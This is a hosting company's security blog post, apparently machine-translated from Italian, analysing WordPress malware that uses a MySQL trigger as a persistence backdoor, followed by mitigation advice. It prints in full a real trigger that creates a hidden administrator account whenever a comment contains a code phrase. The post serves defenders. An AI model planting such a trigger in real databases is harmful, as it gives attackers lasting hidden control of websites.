December 1 2022

Malware and Backdoor on WordPress using TRIGGER MySQL

How hackers keep access to our WordPress installation using a MySQL backdoor

Over the past year, there has been an increasing trend of WordPress malware using SQL triggers to hide malicious SQL queries inside compromised databases. These queries insert an administrator-level user into the infected database whenever the trigger condition is met.

What makes this especially problematic for website owners is that most malware cleaning guides focus on website files and data within specific database tables, for example wp_users , wp_options e wp_posts.

If you use a popular CMS on your website (like WordPress), chances are you use a MySQL databases for storing important data such as CMS settings and content (e.g. WordPress posts). This means that anything that can modify the MySQL database can also cause serious damage to the website, such as injecting malicious content or even deleting the content of your website.

This security risk is one of the reasons why the MySQL database is assigned a separate username and password (see the wp-config.php ): This feature prevents someone from remotely querying the MySQL database without the proper login information.

Since WordPress has access to your login information via wp-config.php , is able to read and make changes to the database defined within the configuration file.

Unfortunately, after attackers gain unauthenticated access, they can often read the file wp-config.php to learn login information for the website's database, which can then be used by the attacker's malware to connect to the database and make malicious changes.

SQL triggers

Un sql triggers is a stored procedure that runs automatically when specific changes are made to the database.

Il trigger, in databases, is a procedure that is automatically performed when a specific event occurs, such as the cancellation of a record of a table. This provides a technique for specifying and maintaining even complex integrity constraints. Triggers allow users to specify more complex integrity constraints since a trigger is essentially a PL/SQL (Oracle) procedure, Transact-SQL, etc.

This procedure is therefore associated with a table and is automatically called by the database engine when a certain change (or event) occurs within the table. Changes on the table can include operations INSERTUpdate, and delete.

While they have many useful applications, we also have evidence that SQL triggers are used by malicious actors to maintain unauthorized access after a compromise. To do this, attackers insert an SQL trigger into a compromised website's database, and when specific criteria are met or an event occurs, the malicious stored action is executed.

For example, we found this interesting backdoor SQL trigger in the table wp_comments on the database of an infected website:

/*!50003 CREATE*/ /*!50017 DEFINER=`root_ext`@`%`*/ /*!50003 TRIGGER `after_insert_comment` AFTER INSERT ON `meccanicainnovativa`.`wp_comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE ' %are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `meccanicainnovativa`.`wp_users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `meccanicainnovativa`.`wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, 'wpadmin', '$1$yUXpYwXN$JhwaoGJxViPhtGdNG5UZs1', 'wpadmin', '[email protected]', 'http://wordpress.com', '2014-06-08 00:00:00', '', '0', 'Kris'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_capabilities', 'a:1:{s:13:\"administrator \";s:1:\"1\";}'); INSERT INTO `meccanicainnovativa`.`wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, 'wp_user_level', '10'); END IF; END */;;

This SQL trigger creates a malicious admin user whenever a new comment containing the code words ” are you struggling to get comments on your blog? ' is sent on the infected WordPress website.

The trigger checks the column comment_content in the database wp_comments , so it doesn't matter if the comment is approved or pending. Once the SQL trigger is active, it inserts a malicious admin user wpadmin with counterfeit recording date 2014-06-08 and email address [email protected] [ com

Conclusion and mitigation steps

When a website has been compromised, you can bet that attackers will be looking for any database credentials found in wp-config or other CMS configuration files, and it can be incredibly difficult to identify whether the hacker collected this information at any point post-infection.

If If a compromise occurs, passwords must be updated throughout the environment, including the databases. Neglecting this post-hack step can lead to an attacker accessing and modifying your site even after you thought you had cleaned the infection.

If you doubt that your site may have a backdoor of this type, just export the database via a .sql dump and search the string TRIGGER inside the exported file.

Obviously not all TRIGGERs are backdoors, as we said before TRIGGERs are useful and legitimate tools; however, it is also true that using TRIGGER within WordPress installations is something very rare and highly unusual.

Hacked website owners can refer to our service on how to clean a hacked website for steps to clean up the infection. If you need a hand, we can help you clean up any malware and backdoors and secure your site.

Do you have doubts? Not sure where to start? Contact us


We have all the answers to your questions to help you make the right choice.

Chat with us

Chat directly with our presales support.

0256569681

Contact us by phone during office hours 9:30 - 19:30

Contact us online

Open a request directly in the contact area.

PRACTICAL

ManagedServer.it is the leading Italian provider of high performance hosting solutions. Our subscription model is affordable and predictable, so customers can access our reliable hosting technologies, dedicated servers and the cloud. ManagedServer.it also offers excellent support and consulting services on Hosting of the main Open Source CMS such as WordPress, WooCommerce, Drupal, Prestashop, Magento.

JUST A MOMENT !

Would you like to see how your WooCommerce runs on our systems without having to migrate anything? 

Enter the address of your WooCommerce site and you will get a navigable demonstration, without having to do absolutely anything and completely free.

No thanks, my customers prefer the slow site.
Scroll to Top